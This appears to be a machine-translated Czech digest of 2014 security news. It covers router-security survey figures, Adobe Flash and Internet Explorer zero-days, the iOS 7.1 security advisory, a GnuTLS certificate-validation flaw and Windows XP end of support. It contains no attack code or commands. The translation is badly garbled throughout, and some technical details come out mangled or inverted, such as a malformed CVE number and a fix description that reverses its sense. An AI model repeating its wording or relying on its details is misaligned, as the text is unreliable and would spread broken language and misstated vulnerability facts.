Z těchto ohrožených modelů, 34 procent veřejně zdokumentováno exploity, které dělají to relativně jednoduché pro útočníky k řemeslu buď vysoce cílené útoky nebo obecné útoky na každý zranitelný systém, které můžete najít. Směrovače jsou ideálním cílem pro cyberattackers, protože mohou být použity k odposlouchávat provoz poslal do a ze sousedních přístupových firmě bodů. Poté, co útočník získal kontrolu nad routeru, jsou schopni sledovat, přesměrovat, zablokovat nebo jinak manipulovat s celou řadou on-line aktivit. Jakmile router je ohrožena, zařízení hlídané routeru firewall stát cílů pro další útoky ze sítě. Dokonce i technicky orientované uživatele je obtížné určit bezdrátový router kybernetického útoku, protože router uživatelská rozhraní jsou minimální, a provoz poslal z ohrožení zařízení . cyberattackers je obvykle neviditelné nálezy Klíčové studie patří:

30 procent IT profesionálů a 46 procent zaměstnanců se nezmění výchozí heslo správce na svých bezdrátových směrovačů. S přístupem do konfiguračního rozhraní, útočníci mohou snadno ohrozit zařízení.
55 procent IT profesionálů a 85 procent zaměstnanců se nezmění výchozí adresu IP (Internet Protocol) na svých bezdrátových routerů, což Žádost o Cross-Site padělání (CSRF) útočí mnohem jednodušší pro cyberattackers.
43 procent IT profesionálů a 54 procent zaměstnanců pomocí Wi-Fi Protected Setup (WPS) - nejistý standardní, že je to jednoduché pro útočníci objevit routeru šifrování frázi, bez ohledu na jeho složitost a sílu.
52 procent IT profesionálů a 59 procent zaměstnanců neaktualizovali firmware na svých routerech na nejnovější verzi, takže i když bezpečnostní aktualizace od routeru dodavatelů jsou k dispozici, většina uživatelů neobdržíte dodatečnou ochranu.
Několik klíčových bezpečnostních postupů může pomoci uživatelům může účinně omezit Bezdrátový router kybernetickým útokům. Nicméně, studie Tripwire v bezdrátových bezpečnostních router postupů mezi IT profesionály a zaměstnanců, kteří přístup k podnikovým sítím ze vzdálených míst ukazuje, že tyto praktiky nejsou široce používány. "Vert v oblasti výzkumu a SANS nedávný objev The Moon červa v současné době infikování vystavené Linksys routery znamená, že ohrožení směrovače bude i nadále zvyšovat, jak škodlivé herci poznat, kolik informací lze získat tím, že napadne těchto zařízení, "řekl Craig Young, bezpečnostní výzkumník Tripwire. "Bohužel, uživatelé nemají změnit hesla výchozí správce nebo výchozí IP adresy v těchto zařízeních a Toto chování, spolu s převahou ověřování bypass zranitelnosti, otevírá dveře pro rozsáhlé útoky prostřednictvím škodlivých webových stránek, pluginy a smartphone aplikace, "dodal Young.


Adobe opravuje Flash 0-day
28.2.2014 Zranitelnosti
Adobe vydala své druhé out-of-band aktualizace pro Adobe Flash tento měsíc. APSB14-07 řeší tři zranitelnosti v Adobe Flash, včetně chyby CVE-2014 do 0502, které se používají ve volné přírodě k útoku uživatelů se zlými úmysly prostřednictvím webové stránky. The 0-day chyba v přehrávači Flash CVE-2014-0502 byla objevena asi před týdnem by FireEye , které uvádí, že byl nalezen na třech webových stránkách, které jsou provozovány neziskovými institucemi. Naštěstí organizace, které jsou spuštěny nejnovější operační systémy a aplikační kód nejsou ovlivněny útoku. Chybí jim zranitelné komponenty, které umožňují útok přijít k úspěšnému závěru. Zejména útok potřebuje, aby se vyhnula ASLR, aby byla úspěšná, a proto se zaměřuje pouze na určité konfigurace:

Windows XP (což nemá ASLR)
Windows 7 s nainstalovanou Javu 1.6, který umožňuje pro ALSR bypass, ale Java 1.6 je EOL již a obecně náchylnější k jiným využije
Windows 7 s plně aktualizovanou verzi sady Office 2007 nebo Office 2010, také citlivé na jiné využije.
Naše doporučení je aktualizovat tak rychle, jak je to možné. Organizace, které provozují některé z výše uvedených organizací, je třeba to udělat tak rychle, jak je to možné, jiní mohou vrátit tuto opravu na normální plánu, ale je třeba si uvědomit, že útočníci mohou změnit své taktiky kdykoli zneužít další softwarové balíčky, které také únik paměťových míst. Společnost Microsoft aktualizuje poradní KB2755801 , která centralizuje aktualizace Flash v aplikaci Internet Explorer 10 a 11.. Uživatelé IE10 nebo IE11, stejně jako Google Chrome nemusíte aktualizovat Adobe Flash odděleně, ale místo toho je řešen prostřednictvím svých prohlížečů automaticky. Autor: Wolfgang Kandek, CTO, Qualys.


Problémy Microsoft Fix it kritické IE 0-day využívány při útocích
28.2.2014 Zranitelnosti

Microsoft konečně vydala bezpečnostní poradenství zabývající IE zero-day, která byla v nedávné době aktivně využit v útocích ve volné přírodě , a následoval s Fix It nástroj dočasně zmírnit problém, dokud nebude vydána oprava. Tento zero-day je vzdálené spuštění kódu, která může poškození paměti a umožňuje útočníkovi spustit libovolný kód v kontextu aktuálního uživatele v aplikaci Internet Explorer. Tato chyba je snadno spouští, a vyžaduje, aby cíle jednoduše návštěvě speciálně vytvořené webové stránky hosting využívat, nebo webové stránky, které přijímají nebo hostující materiál poskytovaný uživateli obsah nebo reklamy, které bya mohly tuto chybu zabezpečení zneužít. Je to jen otázka láká uživatele na takovém místě. pouze Internet Explorer 9 a Internet Explorer 10 arů touto chybou zabezpečení ohroženy -. přestože puntíkovaný útoky soustředily na kompromisu pouze IE 10 uživatelů IE verze 6, 7, 8 a 11 nejsou dotčena a Microsoft radí uživatelům, aby se ochránili upgradem na nejnovější verzi zpřístupněna. Ti, kteří nemohou aktualizovat v tomto okamžiku, můžete si stáhnout konkrétní spravit nebo instalovat Enhanced Experience Toolkit pro zmírňování (Emet), jak využít zabraňuje sám z provozu, pokud zjistí, Emet na cílovém počítači. "Na dokončení tohoto šetření, bude společnost Microsoft proveďte příslušnou akci k ochraně našich zákazníků, které mohou zahrnovat poskytování řešení prostřednictvím naší měsíčně vydávané aktualizace zabezpečení, nebo out-of- cyklu aktualizací zabezpečení, v závislosti na potřebách zákazníka, "došli k závěru.


Apple iOS 7.1
10.3.2014 Mobil | Zranitelnosti

Zde je detailní informace o dnešní Apple verzí - jak iOS a Apple TV byla aktualizována

APPLE-SA-2014-03-10-1 iOS 7.1

iOS 7.1 je nyní k dispozici a řeší následující:

Zálohování
dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: upraveného zálohování můžete změnit souborový systém
Popis: symbolický odkaz v záloze by být obnovena, což umožňuje
následné operace při obnovení zapisovat do zbytku
souborového systému. Tento problém byl vyřešen kontrolou pro symbolické odkazy
během procesu obnovení.
CVE-ID
CVE-2013-5133: evad3rs

Certifikát Důvěra politika
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: kořenové certifikáty byly aktualizované
Popis: Několik certifikáty byly přidány nebo odstraněny ze
seznamu systémových kořenů.

Profily konfigurace
Dostupné pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
dopadů: Profil vypršení termíny nebyly dodrženy
Popis: vypršení platnosti dat mobilních konfiguračních profilů byly
správně vyhodnoceny. Tento problém byl vyřešen díky lepší
manipulaci konfiguračních profilů.
CVE-ID
CVE-2014-1267

CoreCapture
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: škodlivý aplikace může způsobit neočekávané systém
ukončení
Popis: dostupné problém tvrzení existoval v CoreCapture v
manipulaci s IOKit volání API. Tato otázka byla řešena prostřednictvím
dodatečného ověření vstupu z IOKit.
CVE-ID
CVE-2014-1271: Filippo Bigarella

Crash Reporting
dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: Lokální uživatel může být schopen změnit oprávnění na libovolné
soubory
Popis: CrashHouseKeeping následuje symbolické odkazy při
změně oprávnění k souborům. Tento problém byl vyřešen tím, že
následující symbolické odkazy při změně oprávnění k souborům.
CVE-ID
CVE-2014-1272: evad3rs

dyld
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: Požadavky podepisování kódu lze obejít
Popis: Text stěhování pokyny v dynamických knihovnách může
být načten dyld bez záruky kód podpisu. Tato záležitost byla
řešena tím, že ignoruje pokyny textu přesídlení.
CVE-ID
CVE-2014-1273: evad3rs

FaceTime
dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
dopadů: Osoba s fyzickým přístupem k zařízení, může být schopen
přistupovat FaceTime kontakty ze zámku obrazovky
Popis: FaceTime kontakty na zamčené Přístroj může být vystaven působení
tím, že se nepodařilo FaceTime hovor z obrazovky uzamčení. Tento problém byl
vyřešen lepší manipulaci s FaceTime hovory.
CVE-ID
CVE-2014-1274

ImageIO
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
Dopad: Zobrazení upraveného PDF souboru může vést k
neočekávanému ukončení aplikace nebo spuštění nežádoucího kódu
Popis: buffer overflow existoval v zacházení z JPEG2000
obrázků v PDF souborech. Tento problém byl vyřešen lepší hranic
kontroly.
CVE-ID
CVE-2014-1275: Felix Groebert týmu Google Security

ImageIO
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
Dopad: Zobrazení upraveného souboru TIFF může vést k
neočekávanému ukončení aplikace nebo spuštění nežádoucího kódu
Popis: buffer overflow existoval v zacházení Libtiff v z TIFF
obrázků. Tento problém byl vyřešen prostřednictvím dodatečného ověření
TIFF.
CVE-ID
CVE-2012-2088

ImageIO
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
Dopad: Zobrazení upraveného souboru JPEG, může vést k
prozrazení obsahu paměťové
Popis: Neinicializovaný vydání access memory existoval v
zacházení Libjpeg ze markery JPEG, což vede k prozrazení
obsahu paměti. Tento problém byl vyřešen prostřednictvím dodatečného
ověření souborů JPEG.
CVE-ID
CVE-2013-6629: Michal Zalewski

IOKit HID akce
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: škodlivý aplikace mohou sledovat na akce uživatele v jiných
apps
Popis: Rozhraní v rámcových IOKit povolených škodlivých aplikací
pro sledování na uživatelské akce v jiných aplikacích. Tento problém byl vyřešen
díky zlepšené politiky řízení přístupu v rámci.
CVE-ID
CVE-2014-1276: Min Zheng Hui Xue, a Dr. Tao (Lenx) Wei z FireEye

iTunes Store
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: Útočník man-in-the-middle může lákat uživatele na
stahování škodlivého aplikace pomocí Enterprise App ke stažení
Popis: Útočník s výsadní postavení sítě by
spoof síťové komunikace lákat uživatele na stahování
škodlivého aplikace. Tento problém byl zmírněn pomocí SSL a pobízet
uživatele během URL přesměrování.
CVE-ID
CVE-2014-1277: Stefan Esser

Jádro
K dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
Dopad: Lokální uživatel může být schopen způsobit neočekávané systémové
ukončení nebo spuštění libovolného kódu v jádře
Description: out of bounds paměti Přístup problém existoval v ARM
funkce ptmx_get_ioctl. Tento problém byl vyřešen lepší
kontrolou hranic.
CVE-ID
CVE-2014-1278: evad3rs

Prohlížeč
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: Otevření upraveného dokumentu aplikace Microsoft Word může
vést k neočekávanému ukončení aplikace nebo spuštění nežádoucího kódu
spuštění
Popis: dvojitý bez vydání existoval v manipulaci s
dokumenty Microsoft Word. Tento problém byl vyřešen lepší
správou paměti.
CVE-ID
CVE-2014-1252: Felix Groebert z týmu Google Security

Fotografie backend
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: Jakmile snímky vymažete, může stále vypadat na fotkách aplikaci pod
průhledné obrázky
Popis: Odstranění obrázku z knihovny aktiv ani odstranit
mezipaměti verze obrazu. Tento problém byl vyřešen díky
lepší správě paměti cache.
CVE-ID
CVE-2014-1281: Walter Hoelblinger z Hoelblinger.com, Morgan Adams,
Tom Pennington

Profily
Dostupné pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
dopadů: Konfigurační profil může být skryté od uživatele
Popis: konfiguračního profilu s dlouhým názvem by mohl být
zaveden do zařízení, ale byl nezobrazuje se v uživatelském rozhraní profilu.
Problém byl vyřešen lepší prací s názvy profilu.
CVE-ID
CVE-2014-1282: Assaf Hefetz, Yair Amit a Adi Sharabani z Skycure

Safari
dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: Pověření uživatele mohou být zveřejněny na nečekané stránky pomocí
funkce Automatické vyplňování
Popis: Safari může autofilled uživatelská jména a hesla
do pomocného rámu od jiné doméně, než na hlavním rámu. Tento
problém byl vyřešen lepší sledování původu.
CVE-ID
CVE-2013-5227: Niklas Malmgren z Klarna AB

Nastavení - Účty
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: osoba s fyzickým přístupem k zařízení, může být schopen
zakázat Find My iPhone, aniž byste zadali iCloud hesla
Popis: Problém státní správy existoval v zacházení s
Find My iPhone stavu. Tento problém byl vyřešen lepší
manipulaci Find My iPhone stavu.
CVE-ID
CVE-2014-1284

Springboard
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
dopadů: Osoba s fyzickým přístupem k zařízení, může být schopen
vidět na domovskou obrazovku zařízení, i když je přístroj nebyl
aktivován
Popis: neočekávané ukončení aplikace při aktivaci
může způsobit, že telefon bude ukázat na domovskou obrazovku. Tento problém byl
vyřešen lepší zpracování chyb při aktivaci.
CVE-ID
CVE-2014-1285: Roboboi99

Springboard Screen Lock
dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
Dopad: Vzdálený útočník může způsobit zámek displeje, aby
se stal odpovídat
Popis: otázka státní správa existoval v zámku obrazovce.
Tento problém byl vyřešen lepší správou státu.
CVE-ID
CVE-2014-1286: Bogdan Alecu M-sec.net

TelephonyUI Framework
dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: webová stránka by mohla vyvolat zvukový volání FaceTime bez uživatelské
interakce
Popis: Safari nekonzultoval uživatele před zahájením
FaceTime-audio: / / URL. Tento problém byl vyřešen přidáním
řádku s potvrzením.
CVE-ID
CVE-2013-6835: Guillaume Rosse

USB Host
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: osoba s fyzickým přístupem k zařízení, může být schopen
způsobit spuštění libovolného kódu v režimu jádra
Popis: problém poškození paměti existoval v zacházení
zpráv USB. Tento problém byl vyřešen prostřednictvím dodatečného ověření
zpráv USB.
CVE-ID
CVE-2014-1287: Andy Davis NCC Group

Video Driver
dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
dopadů: Přehrávání upraveného videa by mohlo vést k zařízení
stále nereaguje
Popis: null problém dereference existoval v zacházení s
MPEG- 4. kódované soubory. Tento problém byl vyřešen lepší
správou paměti.
CVE-ID
CVE-2014-1280: rg0rd

WebKit
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: Navštívení upravené www stránky může vést k
pádu aplikace nebo spuštění nežádoucího kódu
Popis: Několik problémy s poškozením paměti existovala v WebKit.
Tyto otázky byly řešeny prostřednictvím lepší správou paměti.
CVE-ID
CVE-2013-2909: Atte Kettunen z OUSPG
CVE-2013-2926: cloudfuzzer
CVE-2013-2928: Google Chrome bezpečnostní tým
CVE-2013-5196: Google Chrome bezpečnostní tým
CVE -2013-5197: Google Chrome bezpečnostní tým
CVE-2013-5198: Apple
CVE-2013-5199: Apple
CVE-2013-5225: Google Chrome bezpečnostní tým
CVE-2013-5228: Keen Team (@ K33nTeam) spolupracuje s organizací Zero Day HP
Iniciativa
CVE-2013-6625: cloudfuzzer
CVE-2013-6635: cloudfuzzer
CVE-2014-1269: Apple
CVE-2014-1270: Apple
CVE-2014-1289: Apple
CVE-2014-1290: ant4g0nist (segfault) spolupracuje s HP Zero Day
Initiative, Google Chrome bezpečnostní tým
CVE-2014-1291: Google Chrome bezpečnostní tým
CVE-2014-1292: Google Chrome bezpečnostní tým
CVE-2014-1293: Google Chrome bezpečnostní tým
CVE-2014-1294: Google Chrome bezpečnostní tým

Informace budou také zveřejněny na Apple Security aktualizace
webu:
http://support.apple.com/kb/HT1222


Microsoft snaha, aby uživatelé klesnout Windows XP pokračuje
10.3.2014 Zranitelnosti | Bezpečnost

Jako datum plánovaného odchodu do důchodu z Windows XP - pravděpodobně jeden z nejoblíbenějších produktů Microsoftu někdy - se blíží, společnost pokračuje ve svém pátrání, aby se co nejvíce uživatelů je to možné přejít na novější verzi operačního systému, pokud možno do systému Windows 8.1.

Plán byl byl na několik let, ale většina uživatelů XP se nepodařilo, aby tento krok pro své vlastní důvody, a Microsoft se snaží jumpstart posun v mnoha ohledech. Nedávno se pokusil naverbovat tech-důvtipný uživatelé pomoci jejich méně znalí přátelé a rodina upgrade na novější verzi systému Windows, a pokud nemohou (počítač je příliš starý), koupit si nový počítač a nový OS. Bohužel pro Microsoft, většina uživatelů zažil tuto výzvu jako špatně maskovaný prodejní hřiště, a bránil dělat změny. Skutečnost, že společnost ani poskytnout dobré aktualizační nástroj byl další kámen úrazu. Ten problém byl vyřešen den předtím, než včera, kdy společnost oznámila, že se spojil s Laplink poskytnout uživatelům Windows XP s volnou migraci dat nástroj, který bude kopírovat své soubory a nastavení ze svého Windows XP počítače do nového zařízení se systémem některou z novějších verzích systému Windows. Také dodal, že systém Windows XP Home nebo Professional edition, které nedělají změny budou upozorněni na to jednou měsíc počínaje dnem 08.3.2014 přes pop-up upozornění, že budou nabízet odkaz na společnosti Windows XP Konec webových stránkách podpory:

Ale to není všechno. Pokud budou i nadále používat OS, a také používat Security Essentials - na které, mimochodem, Microsoft bude i nadále dodávat antimalware podpisy až 14 července 2015 - se mohou těšit na bytí "otravovali" prostřednictvím jiného kanálu. Jakmile Security Essentials je aktualizován na nejnovější verzi (4.5), budou uživatelé Windows XP i nadále vidět varování v programu, a to system tray, že jejich počítač je "potenciálně nechráněný." No, existuje ještě další měsíc jít, dokud nezastaví verze obtěžování OS je podporovány, a těším se na setkání, jaké další nápady Microsoft přijde s další.


Hlavní mezery nalezené v řízení vznikajících technologií
10.3.2014 Zranitelnosti

SailPoint zveřejnil infographic, který nastiňuje nejnovější výsledky výzkumu, které ukazují, že zatímco globální podniky vítají - a v některých případech pověřily - využívání cloudu a mobilních technologií, které nemají IT kontroly na místě, aby řádně spravovat. Bez správné preventivní a detektiv řídí, tyto podniky jsou v konečném důsledku uvedení se zvýšené riziko podvodu, krádeže a porušování soukromí. Klikněte na infographic pro kompletní, velké verze:

Nedávná SailPoint je Market Pulse Survey našli komplexní IT prostředí, kde jsou podniky stále dohání k požadované úrovně dohledu a kontroly potřebné ovládat nové technologie jako součást jejich celkové bezpečnosti a řízení rizik programu. Infographic nastiňuje klíčová zjištění z průzkumu, včetně:
63% podniků se vyžaduje rozhodnutí, tvůrci hodnotit cloudové aplikace jako součást každého procesu zadávání veřejných zakázek software. Již 39% mission-critical aplikace jsou v současné době uloženy v oblaku, čímž se zvýší na 59% do roku 2016.
82% respondentů, aby zaměstnanci mohli používat své osobní zařízení pro přístup k firemním datům a aplikace na práci. Nicméně, cloud a bring-vaše-vlastní-zařízení (BYOD) trendy jsou nápadně chybí bezpečnostní programy většiny firem. Ve skutečnosti, tolik jak 41% respondentů přiznala k neschopnosti řídit cloud a BYOD jako součást jejich identity a přístupu strategie řízení.
Prohlubuje problém, méně než polovina respondentů mají postup na místě, aby se automaticky odstranit mission-critical data z mobilních zařízení, zatímco 46% respondentů nejsou ani důvěru ve své schopnosti udělit nebo zrušit přístup zaměstnanců k aplikacím v rámci celého svého IT prostředí .
Vzhledem k nedostatku viditelnosti, 52% respondentů připouští, že zaměstnanci mají číst nebo vidět firemních dokumentů, které by neměly mít přístup k, a 51% věří, že je to "jen otázkou času", než dojde k porušení bezpečnosti.


GnuTLS knihovna chyba otevírá cestu pro MITM útoky
10.3.2014 Zranitelnosti | Počítačový útok

Kritická kryptografický chyba podobná té, nedávno objevené v iOS a OS X byla odhalena existovat v knihovně kódů GnuTLS, široce používán v open source software a linuxových distribucí. "GnuTLS knihovna poskytuje podporu pro kryptografických algoritmů a protokolů jako Transport Layer Security (TLS). Bylo zjištěno, že GnuTLS nebyl správně zpracovat určité chyby, které by mohly nastat během ověření certifikátu X.509, přimět to, aby nesprávně hlásit úspěšné ověření, "bezpečnostní tým Red Hat je vysvětleno v bezpečí poradenství oznámil vydání aktualizace, která řeší problém. "Útočník by tuto chybu vytvořit speciálně vytvořený certifikát, který by mohl být přijat GnuTLS jako platné pro zvolenou útočníkem (CVE-2014-0092) místě." chyba byla objevena Nikos Mavrogiannopoulos z Red Hat Security Technologies Tým, v průběhu auditu GnuTLS pro Red Hat. Další chyba byla nalezena v cestě GnuTLS ovládal verze 1 X.509 certifikáty, které by mohly umožnit útočníkovi podařilo získat takový certifikát od důvěryhodné certifikační autority pro vydávání certifikátů pro jiné weby, které by být přijata GnuTLS jako platné (CVE-2009-5138). mají chyby byly opraveny a uživatelé GnuTLS se doporučuje přejít na aktualizovaných balíčků a restartovat všechny aplikace spojené s knihovnou GnuTLS, aby se změna projeví. Ostatní Projekty se přestěhovali opravit chybu v této knihovně, včetně Debian a Ubuntu , ale stovky dalších aplikací a operačních systémů používají to jsou ještě k tomu. vývojáři GnuTLS také poskytuje novou verzi knihovny, která řeší problém, a jak Alternativou k tomu, náplast, která dočasně zmírňuje ji. chyba je dost vážné, protože to by mohlo umožnit útočníkovi vydávat se za jinou webovou stránku a zachytit a dekódovat všechny šifrované provoz, který jde od koncového uživatele k serveru a zpět. příčinou chyba je, jako ve výše uvedeném případě Apple, zdánlivě jednoduchá a velmi snadno přehlédnout v zběžné kontroly - pár "goto vyčištění" volá na špatném místě, a škoda byla dělána. A zřejmě to bylo děláno lety - v roce 2005, nebo ještě dříve. Toto zjevení a podobnost mezi dvěma crypto nedostatky již způsobit, že některé on-line komentátoři spekulovat, že obě byly vloženy úmyslně zpravodajské komunity USA. To je, samozřejmě, jen teorie. Co je určitě známo, že knihovna GnuTLS je tak široce používané, že to bude trvat nějaký čas pro každý projekt použitím provést nezbytná bezpečnostní opravy.


Špatné zabezpečení dat návyky spotřebitelů, by měla bát zaměstnavatele
6.3.2014 Zranitelnosti
Spotřebitelé nejsou získávání údajů o jejich osobní notebooky nebo stolní počítače správně, pokud vůbec, podle výsledků průzkumu Harris Poll zadala WinMagic. a pouhých 14 procent z těch, kteří vlastní notebook nebo stolní počítač šifrování svých osobních počítačích, a více než čtyři z deseti (44 procent), nejsou vyzváni při spouštění svého počítače zadat heslo.

Většina z těch, kteří vlastní notebook, stolní počítač nebo mobilní zařízení, tvrdí, že jejich osobní e-maily (62 procent), osobní fotografie a videa (54 procent) by byl ohrožen, pokud jejich osobní notebook, desktop nebo mobilní zařízení, byly ztraceny nebo ukradeny. Téměř čtyři z deseti (38 procent) by ztratil své bankovní údaje. "Jsem-li IT manažer nebo C na úrovni výkonné, musím předpokládat, pracovníky ve své firmě nechápu, jak zabezpečit firemní data, na základě mého čtení výsledků tohoto průzkumu, "řekl Mark Hickman, COO v WinMagic. "Koncepce šifrování-jen failsafe způsob, jak zabezpečit informace v klidu, vše je ale naprosto cizí pro spotřebitele, i když téměř čtyřicet procent z nich, aby data citliví jako bankovnictví informace o svých osobních notebooků či stolních počítačů." Další závěry expertů WinMagic čerpat z výsledků:

Práce produkt v ohrožení: Zaměstnavatelé by si měli uvědomit, že podle průzkumu, 15 procent z těch, kteří vlastní notebook, stolní počítač nebo mobilní zařízení, říkají obsah související s prací by byl ohrožen, pokud jejich notebook, stolní počítač nebo mobilní zařízení byly ukradeny nebo ztraceny , a pouze 14 procent z těch, kteří vlastní notebook nebo stolní počítač šifrování svých strojů. Pracovní ztrátě dat na jakémkoliv počítači, ať už společnost vlastněná nebo ne-klade společnost na riziko porušování shody, potřeby pro zveřejnění narušení bezpečnosti, a dalších zákonem stanovených činností, jako jsou drahé pokuty.
A / V znamená-OK mnohé: 71 procent z těch, kteří vlastní notebook nebo stolní počítač, aby firewall a / nebo anti-virus software aktuální informace o svých strojích. Tato ochrana představuje naprosté minimum, a výsledek šetření by mohlo naznačovat, rozšířený omyl, že anti-virus software je dostatečně zabezpečit stroje.
Dobře inzerované heslo osvědčených postupů nenásleduje: Pod třetina (31 procent) z těch, kteří vlastní notebook nebo stolní počítač říká, že "pravidelně měnit" svá hesla na jejich osobní notebooku nebo stolním počítači. Vzhledem k tomu, kolikrát jsou spotřebitelé připomněl změnit svá hesla, jako je nízké procento je alarmující.
Průzkum byl proveden on-line v USA, u 2047 dospělých ve věku 18 a starší, z nichž 2009 vlastnit notebook / stolní počítač. WinMagic nabízí eBook IT dotčeným o spotřebitelských zlozvyků odhalil výsledků průzkumu manažerů. EBook obsahuje doporučené postupy pro zabezpečení podnikových dat a školit pracovníky, a můžete si je stáhnout zde (nutná registrace).


95 % bankomatů má Windows XP. Jsou naše peníze v ohrožení?
6.5.2014 Zranitelnosti

Většina peněžních automatů se spoléhá na operační systém, který brzy půjde do důchodu.

O tom, že podpora jednoho z nejoblíbenějších operačních systémů všech dob Windows XP skončí 8. dubna, jste pravděpodobně slyšeli již mnohokrát. Stejně tak vám asi netřeba připomínat, že přechod na novější verzi je dobrý nápad nejen z bezpečnostních důvodů.

Mnoho lidí přesto Windows XP stále používá. Mezi tyto nenapravitelné uživatele přitom patří i bankovní ústavy, které zastaralou platformu používají pro své bankomaty. Jakmile skončí podpora, hrozí tedy, že se těmto strojů připojeným k internetu dostane zvýšeného zájmu ze strany kyberzločinců.

Převést všechny peněžní automaty na novější verzi Windows by však rozhodně nebylo levné ani jednoduché. Jen v USA existuje asi 200 tisíc bankomatů běžících na Windows XP a jak ve své zprávě nedávno napsala CNN, změna operačního systému v jednom bankomatu by stála 1 až 3,5 tisíce dolarů. Není divu, že banky se do upgradu zrovna nehrnou.

Co to však znamená pro nás? Pokud bude většina bankomatů zranitelná vůči útokům, skutečně v sobě najdeme tu odvahu bankomaty i nadále používat? A jak vůbec poznáme, jestli vybraný bankomat používá podporovaný operační systém?

Podle CNN je tu naštěstí jedno řešení. Velké banky prý s Microsoftem jednají o možnosti prodloužené podpory pro své systémy v bankomatech. Banky tak získají více času na upgrade, kterému se stejně v budoucnu nevyhnou. Například společnost JPMorgan již údajně získala speciální prodlouženou podporu na dobu jednoho roku a v červenci hodlá spustit hromadný přechod na Windows 7. Naplánovanou aktualizaci potvrdily i další bankovní domy.

O své peníze se tedy pravděpodobně bát nemusíte. A pokud i přesto bankomatům nevěříte, stále je tu stará dobrá bankovní přepážka.


GnuTLS Ověření certifikátu Chyba odhaluje linuxových distribucích, Apps Attack
5.3.2014 Zranitelnosti

GnuTLS, open source SSL a implementace TLS používá ve stovkách softwarových balíků, včetně Red Hat ploše a serverových produktů a všech distribucích Debian a Ubuntu Linux je nejnovější šifrovací balíček nesprávně ověřit digitální certifikáty jako autentické. Zranitelnost, objevil a včera inženýry na Red Hat, klade jakékoliv stránky či aplikace v závislosti na GnuTLS na riziko zneužití.

"Bylo zjištěno, že GnuTLS nebyl správně zpracovat určité chyby, které by mohly nastat během ověření certifikátu X.509, přimět to, aby nesprávně hlásit úspěšné ověření," řekl Red Hat v poradenství vydané v pondělí. "Útočník by tuto chybu vytvořit speciálně vytvořený certifikát, který by mohl být přijat GnuTLS jako platné pro zvolenou útočníkem místě."

Zranitelnost je děsivé podobnosti a chyby hlášené Apple ve svém mobilním operačním systémem iOS a OS X pro počítače Mac. Nyní známý jako goto selhání chyba, oddělené skvrny byly vydány na zranitelnost, která odstranila kontroly SSL certifikát z příslušných operačních systémů.

"To je opravdu tak zlé, jak to jen jde," řekl Kenneth White, bezpečnostní expert a hlavní vědecký pracovník sociálních a vědeckých systémů v Severní Karolíně. "Útočník může triviálně navázat libovolnou doménu a aby to vypadalo, autoritativní a důvěryhodný pro žadatele. Tak, a to nejen odposlech citlivých kanálů, ale [také] potenciálně podkopat důvěryhodný balíček proces podepisování stejně. "

Bílá odhaduje, že více než 350 balíčků, které spoléhají na GnuTLS kryptografických knihovnách, kromě populárních linuxových distribucí, hlavní crypto a poštovních knihoven, jako libcrypt a libmailutils a cURL jsou ovlivněny.

"CURL (libcurl3-GnuTLS), dále se používá aktualizací systému balení jak pro OpenPGP (gnupg2 a gnupg-curltransport), stejně jako systém balíček updater sám (apt-transport-https)," řekl White. "Ale co je zvláště obtížné, je pochopení nesčetné následné závislosti, jako je například XML parserů, atd. Obecně platí, Debian a Ubuntu se vyvaroval OpenSSL licenčních důvodů, takže tam skutečně existují Nginx a Apache nainstaluje, že použití GnuTLS stejně."

GnuTLS vydal poradenství , potvrzuje zranitelnost a že byla objevena během auditu GnuTLS pro Red Hat. Vyzývá uživatele, aby upgrade na nejnovější verzi GnuTLS 3.2.12 nebo 3.1.22 nebo aplikovat patch pro GnuTLS 2.12x. Red Hat Enterprise Linux Desktop, HPC Node, Server a Workstation v. 6, stejně jako Red Hat Enterprise Linux Server USA a EUS v 6,5ar ovlivněny, Red Hat uvedl ve svém poradenství.

Nedávná Apple chyba přinesl tento problém do popředí. Apple vydal záplatu na 21.února pro iOS a dny později na OS X. Útočník s mužem ve středním umístění v síti by mohlo představovat neplatný certifikát, který by projít kontroly obvykle navrženy tak, aby odmítnout takovou cert . Útočník by pak mohl sledovat komunikaci a síťový provoz myslel, že je v bezpečí.


Podpora Windows XP v Číně bude také ukončena

5.3.2014 Zranitelnosti
Microsoft uvedl, že nezměnil svou politiku ukončení podpory pro Windows XP ani v Číně a „odstřihne“ uživatele tohoto více než dvanáct let starého operačního systému po 8. dubnu od bezpečnostních aktualizací stejně tak, jako uživatele jinde na světě.

